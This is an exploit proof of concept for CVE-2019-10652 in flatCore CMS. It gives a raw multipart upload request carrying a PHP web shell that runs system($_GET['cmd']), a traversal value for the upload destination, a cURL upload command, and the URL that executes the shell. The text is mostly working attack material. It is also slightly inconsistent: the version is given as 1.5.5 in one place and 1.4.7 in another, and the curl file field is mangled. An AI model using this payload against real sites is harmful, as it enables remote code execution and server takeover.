📄 flatCore 1.5.5 Shell Upload

# Exploit Title: [flatCore Arbitrary .php File Upload via acp/acp.php]
    # Date: [2024-10-26]
    # Exploit Author: [CodeSecLab]
    # Vendor Homepage: [https://github.com/flatCore/flatCore-CMS] 
    # Software Link: [https://github.com/flatCore/flatCore-CMS]
    # Version: [1.5.5] 
    # Tested on: [Ubuntu Windows]
    # CVE : [CVE-2019-10652]
    PoC：
    1)
    1. Access the flatCore Admin Panel
    URL: http://flatcore/acp/acp.php
    Log in with valid administrative credentials.
    2. Upload a Malicious PHP File
    Navigate to the upload section where you can add new files or images. This is usually accessible via the "Media" or "Addons" feature in the admin panel.
    3. Intercept and Modify the Upload Request
    Using a tool like Burp Suite or by modifying the request directly, prepare the following POST request:
    
    POST /acp/core/files.upload-script.php HTTP/1.1
    Host: flatcore
    Content-Type: multipart/form-data; boundary=---------------------------735323031399963166993862150
    Content-Length: <calculated length>
    Cookie: PHPSESSID=<valid_session_id>
    
    -----------------------------735323031399963166993862150
    Content-Disposition: form-data; name="file"; filename="exploit.php"
    Content-Type: application/octet-stream
    
    <?php
    // Simple PHP backdoor code
    echo "Vulnerable File Upload - PoC";
    system($_GET['cmd']);
    ?>
    -----------------------------735323031399963166993862150
    Content-Disposition: form-data; name="upload_destination"
    
    ../content/files
    -----------------------------735323031399963166993862150
    Content-Disposition: form-data; name="csrf_token"
    
    <valid_csrf_token>
    -----------------------------735323031399963166993862150
    Note: Replace <valid_session_id> and <valid_csrf_token> with values from your authenticated session.
    4. Verification
    After uploading, the PHP file should be accessible at: http://flatcore/content/files/exploit.php
    Access the uploaded file: http://flatcore/content/files/exploit.php?cmd=whoami
    
    PoC 
    2)
    # PoC to exploit unrestricted file upload vulnerability in flatCore 1.4.7
    # Target URL: http://flatcore/
    # The attacker must be authenticated as an administrator to exploit this vulnerability
    
    # Step 1: Log in as an administrator and obtain the CSRF token
    # You need to obtain the CSRF token manually or through a script since the token is required for the file upload.
    
    # Step 2: Upload a malicious PHP file using the file upload feature
    
    # Create a PHP reverse shell or any arbitrary PHP code and save it as shell.php
    echo "<?php phpinfo(); ?>" > shell.php
    
    # Upload the PHP file using cURL
    curl -X POST "http://flatcore/acp/core/files.upload-script.php" \
        -H "Content-Type: multipart/form-data" \
        -F "[email protected]" \
        -F "csrf_token=YOUR_CSRF_TOKEN_HERE" \
        -F "upload_destination=../content/files" \
        -F "file_mode=overwrite" \
        -b "PHPSESSID=YOUR_SESSION_ID_HERE"
    
    # Replace YOUR_CSRF_TOKEN_HERE and YOUR_SESSION_ID_HERE with valid CSRF token and PHPSESSID
    
    # Step 3: Access the uploaded malicious PHP file
    echo "Visit the following URL to execute the uploaded PHP file:"
    echo "http://flatcore/content/files/shell.php"
    
    This PoC demonstrates how an attacker can exploit the unrestricted file upload vulnerability to upload a PHP file and execute it on the server.
    [Replace Your Domain Name]